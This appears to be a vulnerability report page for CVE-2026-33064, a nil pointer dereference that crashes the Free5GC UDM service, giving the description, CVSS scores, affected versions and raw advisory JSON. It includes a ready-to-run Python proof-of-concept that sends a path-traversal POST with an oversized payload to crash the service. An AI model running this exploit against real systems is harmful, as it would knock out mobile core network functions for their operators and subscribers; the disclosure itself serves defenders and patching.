Security Vulnerability Report
CVE-2026-33064 CVSS 7.5 HIGH

Published: 2026-03-20 08:16:12
Last Modified: 2026-03-23 18:43:25

Description

Free5GC is an open-source Linux Foundation project for 5th generation (5G) mobile core networks. Versions prior to 1.4.2 are vulnerable to procedure panic caused by Nil Pointer Dereference in the /sdm-subscriptions endpoint. A remote attacker can cause the UDM service to panic and crash by sending a crafted POST request to the /sdm-subscriptions endpoint with a malformed URL path containing path traversal sequences (../) and a large JSON payload. The DataChangeNotificationProcedure function in notifier.go attempts to access a nil pointer without proper validation, causing a complete service crash with "runtime error: invalid memory address or nil pointer dereference". Exploitation would result in UDM functionality disruption until recovery by restart. This issue has been fixed in version 1.4.2.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:free5gc:udm:*:*:*:*:*:go:*:* - VULNERABLE
Free5GC < 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json


def exploit_free5gc_udm(target_ip):
    """
    PoC for CVE-2026-33064: Free5GC UDM Nil Pointer Dereference
    Triggers a panic by sending a crafted POST request to /sdm-subscriptions
    with path traversal and a large payload.
    """
    # Construct the malicious URL with path traversal
    # The endpoint might vary based on deployment, standard is often on port 29503
    base_url = f"http://{target_ip}:29503"
    malicious_path = "/nudm-sdm/v2/sdm-subscriptions/../../"
    target_url = base_url + malicious_path

    # Create a large JSON payload to trigger the parsing condition
    large_payload = {
        "callbackReference": {
            "notifyURI": "http://dummy.com/callback"
        },
        "monitoredResourceUris": ["A" * 10000],  # Large string to stress memory handling
        "subscriptionId": "test-subscription-123"
    }

    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json"
    }

    try:
        print(f"[+] Sending exploit payload to {target_url}")
        response = requests.post(target_url, data=json.dumps(large_payload), headers=headers, timeout=5)

        # If the service crashes, we might not get a response or get a connection error
        print(f"[+] Response Status Code: {response.status_code}")
        print(f"[+] Response Text: {response.text}")
        print("[+] Exploit sent. Check if the UDM service has crashed.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed (Service might have crashed): {e}")


if __name__ == "__main__":
    target = "127.0.0.1"  # Replace with actual target IP
    exploit_free5gc_udm(target)

Raw JSON Data

{"cve": {"id": "CVE-2026-33064", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:12.257", "lastModified": "2026-03-23T18:43:25.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Free5GC is an open-source Linux Foundation project for 5th generation (5G) mobile core networks. Versions prior to 1.4.2 are vulnerable to procedure panic caused by Nil Pointer Dereference in the /sdm-subscriptions endpoint. A remote attacker can cause the UDM service to panic and crash by sending a crafted POST request to the /sdm-subscriptions endpoint with a malformed URL path containing path traversal sequences (../) and a large JSON payload. The DataChangeNotificationProcedure function in notifier.go attempts to access a nil pointer without proper validation, causing a complete service crash with \"runtime error: invalid memory address or nil pointer dereference\". Exploitation would result in UDM functionality disruption until recovery by restart. This issue has been fixed in version 1.4.2."}, {"lang": "es", "value": "Free5GC es un proyecto de código abierto de la Linux Foundation para redes centrales móviles de quinta generación (5G). Las versiones anteriores a la 1.4.2 son vulnerables a un pánico de procedimiento causado por una desreferenciación de puntero nulo (Nil Pointer Dereference) en el endpoint /sdm-subscriptions. Un atacante remoto puede causar que el servicio UDM entre en pánico y falle enviando una solicitud POST manipulada al endpoint /sdm-subscriptions con una ruta URL malformada que contenga secuencias de salto de ruta (../) y una carga útil JSON grande. La función DataChangeNotificationProcedure en notifier.go intenta acceder a un puntero nulo sin la validación adecuada, lo que provoca un fallo completo del servicio con el error 'runtime error: invalid memory address or nil pointer dereference'. 
La explotación resultaría en la interrupción de la funcionalidad del UDM hasta su recuperación mediante un reinicio. Este problema ha sido solucionado en la versión 1.4.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", 
"privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-478"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:udm:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.4.2", "matchCriteriaId": "C4C4212B-95F4-49DD-B6DA-F6DF4D8D7257"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/781", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-7g27-v5wj-jr75", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/udm/commi ... (truncated)